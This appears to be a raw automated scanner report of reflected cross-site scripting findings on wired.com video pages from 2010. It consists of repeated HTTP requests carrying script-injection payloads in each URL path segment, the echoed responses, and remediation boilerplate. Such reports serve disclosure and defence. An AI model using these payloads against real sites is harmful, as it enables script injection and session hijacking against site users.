GET /videof8c52--><script>alert(1)</script>16b9361acca/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29490 Vary: Accept-Encoding Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:52:34 GMT Date: Mon, 22 Nov 2010 00:47:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videof8c52--><script>alert(1)</script>16b9361acca/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddcc0"><a>353379e16c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoddcc0"><a>353379e16c7/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29453 Vary: Accept-Encoding Cache-Control: max-age=276 Expires: Mon, 22 Nov 2010 00:51:35 GMT Date: Mon, 22 Nov 2010 00:46:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoddcc0"><a>353379e16c7 ss_latest-videos c_featured"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6b3"-alert(1)-"04386ae1d6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos1f6b3"-alert(1)-"04386ae1d6d/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:53:28 GMT Date: Mon, 22 Nov 2010 00:48:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... xt/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e120"><a>6ecc891057 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos1e120"><a>6ecc891057/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:37 GMT Date: Mon, 22 Nov 2010 00:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106790
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos1e120"><a>6ecc891057 c_featured"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ac09"-alert(1)-"553b38f47a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured7ac09"-alert(1)-"553b38f47a7/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:54:40 GMT Date: Mon, 22 Nov 2010 00:49:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb0d"><a>c42c591e361 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/featuredeeb0d"><a>c42c591e361/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:53:29 GMT Date: Mon, 22 Nov 2010 00:48:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_featuredeeb0d"><a>c42c591e361"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4184d"-alert(1)-"2754dc14c34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/17165001894184d"-alert(1)-"2754dc14c34/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:54:42 GMT Date: Mon, 22 Nov 2010 00:49:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... xt/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab7c3"-alert(1)-"1a65c8b335a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-ascab7c3"-alert(1)-"1a65c8b335a/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:14 GMT Date: Mon, 22 Nov 2010 00:50:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c18"-alert(1)-"5548a503785 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/61636972400183c18"-alert(1)-"5548a503785 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:55:27 GMT Date: Mon, 22 Nov 2010 00:50:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e91c4--><script>alert(1)</script>46de8dac3cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoe91c4--><script>alert(1)</script>46de8dac3cf/latest-videos/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29452 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:21 GMT Date: Mon, 22 Nov 2010 00:47:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoe91c4--><script>alert(1)</script>46de8dac3cf/latest-videos/featured/1716500189/into-the-unknown/672347081001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae61a"><a>83daec0e404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoae61a"><a>83daec0e404/latest-videos/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29415 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:31 GMT Date: Mon, 22 Nov 2010 00:46:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoae61a"><a>83daec0e404 ss_latest-videos c_featured"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d629"-alert(1)-"11ecc1b8d6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos8d629"-alert(1)-"11ecc1b8d6d/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:27 GMT Date: Mon, 22 Nov 2010 00:48:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf44"><a>5ff97d9d752 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos4cf44"><a>5ff97d9d752/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:25 GMT Date: Mon, 22 Nov 2010 00:47:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos4cf44"><a>5ff97d9d752 c_featured"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5296d"-alert(1)-"e92a5e84c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured5296d"-alert(1)-"e92a5e84c9/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:54:14 GMT Date: Mon, 22 Nov 2010 00:49:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1337f"><a>2a9641c5dbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/featured1337f"><a>2a9641c5dbf/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:43 GMT Date: Mon, 22 Nov 2010 00:48:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_featured1337f"><a>2a9641c5dbf"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f37b"-alert(1)-"7139282558d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/17165001897f37b"-alert(1)-"7139282558d/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:53 GMT Date: Mon, 22 Nov 2010 00:49:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdf70"-alert(1)-"798f3ba9e4a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/1716500189/into-the-unknowncdf70"-alert(1)-"798f3ba9e4a/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:00 GMT Date: Mon, 22 Nov 2010 00:50:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86432"-alert(1)-"fb2fe4ecb38 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
